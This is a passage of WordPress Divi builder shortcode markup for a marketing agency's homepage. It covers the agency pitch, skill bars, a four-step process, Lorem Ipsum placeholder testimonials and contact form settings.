animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\" hover_enabled=\"0\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" 